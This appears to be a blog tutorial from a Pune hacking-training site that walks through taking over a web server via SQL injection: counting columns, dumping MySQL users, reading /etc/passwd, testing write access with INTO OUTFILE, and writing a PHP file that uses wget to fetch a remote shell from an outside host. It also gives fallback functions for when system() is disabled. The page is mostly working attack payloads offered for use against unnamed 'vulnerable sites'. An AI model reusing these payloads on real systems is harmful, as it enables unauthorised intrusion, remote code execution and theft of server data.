Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan


Credits: Mike

Hello Everyone,

Today, we will see how to upload a shell through SQL injection (+No needed an Admin Panel),

Requirements:

  • Vulnerable site.
  • Shell in txt format [Example: http://[site].com/shell.txt].
  • Your Brain (;

~~~
Firstly, we need to use order by statement to count the number of columns.

http://[site].com/index.php?id=1+order+by+1– [TRUE]
http://[site].com/index.php?id=1+order+by+2– [TRUE]
http://[site].com/index.php?id=1+order+by+3– [TRUE]
http://[site].com/index.php?id=1+order+by+4– [*FALSE*]

We made a nice work meanwhile. Now we’re using by UNION SELECT statement:

http://[site].com/index.php?id=-1+UNION+SELECT+1,2,3–

Let’s say that our vulnerable column is: 2, so:

http://[site].com/index.php?id=-1+UNION+SELECT+1,user,3+FROM+mysql.user–

And –> viola! the MySQL user is: Josh(For example).

Let’s continue

http://[site].com/index.php?id=-1+UNION+SELECT+1,load_file(‘/etc/passwd’),3–

You can see the full path in the passwd file.
As you can see, I got the full path! There are many methods in order
to find the full path.

[Example for full path: /home/domain/public_html/] .

What you should now is only to use INTO OUTFILE statement.
Example:

http://[site].com/index.php?id=-1+UNION+SELECT+1,2,3+INTO+OUTFILE+”/home/domain/public_html/test_permission.txt”–

Now, If the page loaded normally(I mean…returned value is TRUE) so we have write access…If not, just look for other directory to write them until you will get TRUE value and the page will load normally.

Ok, now I will try to upload the shell ! :).
Watch and learn Cool :

Quote:http://[site].com/index.php?id=-1+UNION+SELECT+1,”<?php system(‘wget http://othersite.com/shell.txt -O shell.php’); ?>”,3+INTO+OUTFILE+”/home/domain/public_html/login_here_to_upload_shell.php”–

Then, just go to login_here_to_upload_shell.php file and when it finishes to load, go to shell.php and….tada Yeye
You shelled the website 🙂

If system() function is disabled, you can try:

  • ~ exec();
  • ~ shell_exec();
  • ~ file_put_contents();
  • ~ fopen(); \ fwrite();

More tricks and hacks to come, Enjoy !

www.extremehacking.org
Cyber Suraksha AbhiyanCEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNECertified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-IndiaEthical Hacking Course in Pune-India